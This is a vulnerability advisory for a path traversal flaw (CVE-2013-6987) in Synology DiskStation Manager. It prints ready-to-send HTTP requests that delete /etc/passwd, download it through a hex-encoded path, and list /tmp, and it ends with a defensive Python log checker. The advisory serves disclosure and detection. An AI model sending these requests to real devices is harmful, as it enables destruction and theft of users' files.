CVE ID: CVE-2013-6987
Synology DiskStation Manager is the first NAS operating system to provide a web-based, multitasking user interface.
The vendor has released an update that fixes this security issue; download it from the vendor's homepage:
http://www.synology.com
Some examples follow ("test" is a valid shared folder name; the traversal happens because the path parameters are not normalised against that folder before use):
- Delete /etc/passwd:
===========================================
POST /webapi/FileStation/file_delete.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: stay_login=0; id=kjuYI0HvD92m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1
===========================================
- Arbitrary file download:
===========================================
GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1
Host: 192.168.56.101:5000
Connection: keep-alive
Authorization: Basic XXXXXXXX
===========================================
2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd
- Remote file list:
=========================
POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2
folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1
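As an added example (not from the advisory and not Synology's code), a small Python check a defender can run over proxy or web-server logs: it pulls the target path out of the three request shapes shown above (`path=` and `folder_path=` in POST bodies, hex-encoded `dlink=` on the fbdownload GET), decodes it, and flags any path that lexically escapes the shared folder it starts in. The parameter names come from the requests above; the request parsing and the "must stay inside the first folder component" rule are assumptions of this example.

```python
import posixpath
from urllib.parse import parse_qs, urlparse

# Parameter names taken from the three requests above (assumed complete for this example).
PATH_PARAMS = ("path", "folder_path")   # plain paths in POST bodies
HEX_PATH_PARAMS = ("dlink",)            # hex-encoded path on /fbdownload/


def decode_dlink(hex_value):
    """fbdownload carries the target path as a hex string (see the decoded example above)."""
    return bytes.fromhex(hex_value).decode("utf-8", errors="replace")


def escapes_share(user_path):
    """True if, after lexical normalisation, the path no longer lives under the
    shared folder named by its first component (e.g. 'test')."""
    raw = "/" + user_path.lstrip("/")
    first = raw.split("/")[1] if len(raw) > 1 else ""
    parts = [p for p in posixpath.normpath(raw).split("/") if p]
    # Empty result (climbed to '/') or a different top folder means traversal.
    return not parts or parts[0] != first


def extract_paths(request_line, body=""):
    """Collect candidate target paths from a FileStation request.
    Constructed parser: reads the query string of the request line and,
    for POST, the urlencoded body; percent-encoding is decoded by parse_qs."""
    method, target, _ = request_line.split(" ", 2)
    params = parse_qs(urlparse(target).query)
    if method == "POST":
        params.update(parse_qs(body))
    found = []
    for key, values in params.items():
        for value in values:
            if key in PATH_PARAMS:
                found.append(value)
            elif key in HEX_PATH_PARAMS:
                try:
                    found.append(decode_dlink(value))
                except ValueError:
                    found.append(value)  # not valid hex: inspect the raw value anyway
    return found


def flag_traversal(request_line, body=""):
    """Return the paths in one request that escape their shared folder."""
    return [p for p in extract_paths(request_line, body) if escapes_share(p)]
```

A path such as `/test/docs/../photos` normalises to `/test/photos` and is not flagged, so ordinary relative navigation inside a share does not produce false positives.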